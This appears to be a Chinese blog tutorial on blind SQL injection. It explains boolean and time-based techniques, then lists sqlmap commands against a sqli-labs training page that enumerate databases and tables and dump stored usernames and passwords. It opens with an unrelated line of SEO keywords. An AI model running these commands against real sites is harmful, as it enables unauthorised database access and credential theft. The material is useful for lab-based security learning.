网站建设 镇江丹阳,建设网站教程视频视频,哪个网站seo做的最好,自建站做seo本文仅作为学习参考使用#xff0c;本文作者对任何使用本文进行渗透攻击破坏不负任何责任。
引言#xff1a;
盲注简述#xff1a;是在没有回显得情况下采用的注入方式#xff0c;分为布尔盲注和时间盲注。
布尔盲注#xff1a;布尔仅有两种形式#xff0c;ture#…本文仅作为学习参考使用本文作者对任何使用本文进行渗透攻击破坏不负任何责任。
引言
盲注简述是在没有回显得情况下采用的注入方式分为布尔盲注和时间盲注。
布尔盲注布尔仅有两种形式ture对false错两种形式。
对有回显错无回显。根据其性质就可实现盲注。
时间盲注在无任何回显所采用的形式根据数据库响应时间来进行判断。例如若输入值正确页面一秒后响应错误页面三秒后响应。将其转化为布尔盲注来解决无回显但如果数据库卡顿则可能导致误判。
工具注入。
1工具sqlmap。
需要提前安装配置python环境建议使用虚拟机安装的kali linux。自带多种语言环境以及渗透工具便于使用虚拟机以及kali安装源文件可在官网查找此处不做赘述。 sqlmap -u http://172.168.10.129:8001/Less-8/?id1 //-u 是指定url2检测注入点得到了数据库版本传参方式以及漏洞。3查看所有数据库。
sqlmap -u http://192.168.239.1:8001/Less-8/?id1 --dbs
4查看当前使用的数据库。
sqlmap -u http://192.168.239.1:8001/Less-8/?id1 --current-db 5查看当前数据库内的表名。
sqlmap -u http://192.168.239.1:8001/Less-8/?id1 -D security --tables6查看字段名。
sqlmap -u http://192.168.239.1:8001/Less-8/?id1 -D security -T users --columns7查看敏感数据。
sqlmap -u http://192.168.239.1:8001/Less-8/?id1 -D security -T users -C username,password --dump8查看当前数据库的所有用户。
sqlmap -u http://192.168.239.1:8001/Less-8/?id1 --users
这是目前最常用的sql注入工具具体用法参考这篇文章SQLmap使用教程图文教程超详细-CSDN博客
10后记。
sql注入漏洞是最基础的漏洞sqlmap是网络安全维护必不可少的工具。但在学习前也应该先学习一定的诸如url编码常见进制转换php语言以及sql数据库语言。
